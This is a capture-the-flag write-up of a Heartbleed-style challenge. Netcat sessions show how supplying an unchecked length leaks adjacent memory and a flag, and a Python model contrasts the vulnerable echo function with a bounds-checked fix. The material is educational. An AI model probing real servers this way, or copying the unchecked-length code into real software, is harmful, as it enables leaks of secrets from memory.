siunam's Website


Baby’s First Heartbleed

Overview

Background

Author: @JohnHammond#6971

Hey kids!! Wanna learn how to hack??!?! Start here to foster your curiosity!

Press the Start button on the top-right to begin this challenge.

Connect with:
nc challenge.nahamcon.com 31305

Find The Flag

Let’s use nc (Netcat) to connect to the Docker instance:

┌──(root🌸siunam)-[~/ctf/NahamCon-EU-CTF-2022/Warmups/Baby's-First-Heartbleed]
└─# nc challenge.nahamcon.com 31305


===============================================================================
     _   _ _____    _    ____ _____ ____  _     _____ _____ ____  
    | | | | ____|  / \  |  _ \_   _| __ )| |   | ____| ____|  _ \ 
    | |_| |  _|   / _ \ | |_) || | |  _ \| |   |  _| |  _| | | | |
    |  _  | |___ / ___ \|  _ < | | | |_) | |___| |___| |___| |_| |
    |_| |_|_____/_/   \_\_| \_\|_| |____/|_____|_____|_____|____/ 
                                                                      
===============================================================================

THANK YOU FOR CONNECTING TO THE SERVER. . .

TO VERIFY IF THE SERVER IS STILL THERE, PLEASE SUPPLY A STRING.

STRING ['apple']: 

Hmm… Let’s type apple:

STRING ['apple']: apple
LENGTH ['5']: 

The length of the string '5' is 1, which we can verify with python3:

┌──(root🌸siunam)-[~/ctf/NahamCon-EU-CTF-2022/Warmups/Baby's-First-Heartbleed]
└─# python3
[...]
>>> len('5')
1
LENGTH ['5']: 1

... THE SERVER RETURNED:

a

TO VERIFY IF THE SERVER IS STILL THERE, PLEASE SUPPLY A STRING.

STRING ['apple']: 

Wait what??

Umm… What if I enter a length greater than 5?

Let’s try again:

STRING ['apple']: apple
LENGTH ['5']: 10

... THE SERVER RETURNED:

apple@appl

Hmm… Looks like the STRING ['apple'] value itself is useless, but LENGTH ['x'] is never checked against the length of the string: the server echoes back as many bytes as we ask for, so we can leak something interesting through it!

How about we type 1337 in the length?

STRING ['apple']: 
LENGTH ['5']: 1337

... THE SERVER RETURNED:

apple@apple@00@00@00@00@00@00@00@00@00@00@00@00@00@00@apple@00@00@apple@00@apple@00@apple@00@apple@00@flag{bfca3d71260e581ba366dca054f5c8e5}@apple@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00

Oh!! We leaked the flag!
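To see why the server behaves this way, here is an added model of the bug (my own example, not the challenge's server code): the supplied string is copied into a buffer that also holds other data, and the server echoes LENGTH bytes from the start of that buffer without validating LENGTH against the string's real length. The memory layout, the `@00@` filler and the flag value are constructed for the demo; the hardened variant rejects an over-long length.

```python
# Added example: a Heartbleed-style over-read modelled in Python.
# Memory layout, filler and flag are constructed for this demo only.

FILLER = "@00@"                       # stands in for unrelated bytes in memory
FLAG = "flag{constructed_example}"    # placeholder, not the challenge's flag


def build_memory(supplied: str) -> str:
    """Constructed process memory: the supplied string, stale copies of it,
    filler, and a secret that happens to sit nearby."""
    return (supplied + "@" + supplied + FILLER * 3 + "@" + supplied
            + "@" + FLAG + "@" + supplied + FILLER * 2)


def heartbeat_vulnerable(supplied: str, length: int) -> str:
    """Echo `length` bytes starting at the supplied string, trusting `length`.
    Nothing stops `length` from exceeding len(supplied), so whatever follows
    the string in memory is returned too."""
    memory = build_memory(supplied)
    return memory[:length]            # no bounds check against the payload


def heartbeat_fixed(supplied: str, length: int) -> str:
    """Same echo, but the claimed length is validated against the real payload
    before any data is copied back."""
    if length < 0 or length > len(supplied):
        raise ValueError(f"length {length} exceeds payload of {len(supplied)} bytes")
    memory = build_memory(supplied)
    return memory[:length]


def leaks_secret(reply: str) -> bool:
    """Detection helper: did the echoed data carry more than the payload?"""
    return FLAG in reply


if __name__ == "__main__":
    print(heartbeat_vulnerable("apple", 1))     # "a", as in the writeup
    print(heartbeat_vulnerable("apple", 10))    # "apple@appl"
    over = heartbeat_vulnerable("apple", 1337)  # whole buffer, secret included
    print(leaks_secret(over))                   # True
    try:
        heartbeat_fixed("apple", 1337)
    except ValueError as err:
        print("rejected:", err)
```

The first two calls reproduce the exact replies seen above for lengths 1 and 10; the fix is the single comparison of the claimed length against the actual payload size.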

Conclusion

What we’ve learned:

  1. Leaking the flag via missing input validation (the requested length is never checked against the supplied string)